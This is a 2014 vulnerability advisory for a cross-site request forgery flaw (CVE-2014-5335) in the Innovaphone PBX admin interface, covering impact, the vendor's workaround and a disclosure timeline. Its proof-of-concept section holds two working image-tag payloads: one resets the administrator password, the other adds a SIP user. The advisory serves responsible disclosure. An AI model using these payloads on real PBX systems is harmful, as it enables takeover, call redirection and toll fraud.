Title: Innovaphone PBX Admin-GUI CSRF
Impact: High
CVSS2 Score: 7.8 (AV:N/AC:M/Au:S/C:P/I:C/A:C/E:F/RL:U/RC:C)
Announced: August 21, 2014
Reporter: Rainer Giedat (NSIDE ATTACK LOGIC GmbH, www.nsideattacklogic.de)
Products: Innovaphone PBX Administration GUI
Affected Versions: all known versions (tested 10.00 sr11)
CVE-id: CVE-2014-5335

Summary
=======

The innovaphone PBX is a powerful and sophisticated VoIP telephone system for use in professional business environments. In addition to a wide range of IP telephony functionalities, the innovaphone PBX is also equipped with a perfectly integrated Unified Communications solution that can be enabled as needed at any time and at any workspace.

The innovaphone PBX uses a web-based user interface. This UI is vulnerable to cross-site request forgery attacks (CSRF).

Description
===========

The UI does not check if a request was sent originating from a page it delivered before or from an untrusted and potentially malicious source. With a CSRF attack a malicious third party is able to change any configurable items from remote if an administrator is logged in to the user interface and visits a malicious website or clicks a manipulated link under the control of the attacker.

The lack of a logout mechanism and the use of the digest authentication scheme increases the probability of successful exploitation, because the user session will never expire automatically.

Impact
======

The attacker has full control over the innovaphone PBX and is able to manipulate every configuration item and user account data, as well as passwords. This can lead to the redirection of phone calls, denial of service and toll fraud by adding new SIP endpoints.

Proof on Concept
================

Visiting a web page including the following HTML image tag will change the administrator’s password of the innovaphone PBX to 'hacked':

<img src="http://<<PBX>>/CMD0/mod_cmd.xml?cmd=form&redirect=mod_cmd.xml%3Fxsl%3Dcommand.xsl&name=&user=admin&password=hacked&password2=hacked&help=&add.user=&add.pwd=&add.pwd2=&add.level=0&add.end=&kdc.realm=&kdc.address1=&kdc.port1=&kdc.adminport1=&kdc.address2=&kdc.port2=&kdc.adminport2=&kdc.end=&op=OK"></img>

Visiting a web page including the following image will add a new SIP user:

<img src="http://<<PBX>>/PBX0/ADMIN/mod_cmd_login.xml?cmd=submit-object&xsl=pbx_edit_user.xsl&tab-active=&guid=&repsrc=&search-grp=&text=&cn=Hans+Dampf&dn=Hans+Dampf&h323=Hans+Dampf&e164=666&email=&pwd=hans&pwd1=hans&node=root&loc=Opfer&fake=&obj-url=&gi=&config=&no-devs=update&dev1.hw=&dev1.text=&dev1.admin=on&dev1.no-filter=on&dev1.reg=on&filter=&cd-filter=&cfnr=&busy-out=&uc=&gw.name=&gw.ipei=&gw.dsp=&gw.ac=&gw.subs=&gw.fc=&gw.cki=&gw.ciph=&gw.end=.&save=Apply"></img>


Solution
========

Innovaphone recommends to use a dedicated browser only for administration tasks regarding the PBX and close all browser instances when administration is done.
More information can be found on the closed support wiki of innovaphone: http://wiki.innovaphone.com/index.php?title=Support:Protection_against_%22Cross-Site-Request-Forgery%22

This workaround makes sucessful exploitation harder, but an attacker may still be able to use special protocol-handlers to open URLs in different browsers.

No fix will be provided, since the vendor considers this to be a browser problem.


Timeline
========

2014-22-07  Bug found
2014-28-07  Vendor contact
2014-29-07  Vendor reply
2014-29-07  Technical details provided
2014-13-08  Vendor does not plan to patch for now, but provided a workaround
2014-21-08  Public release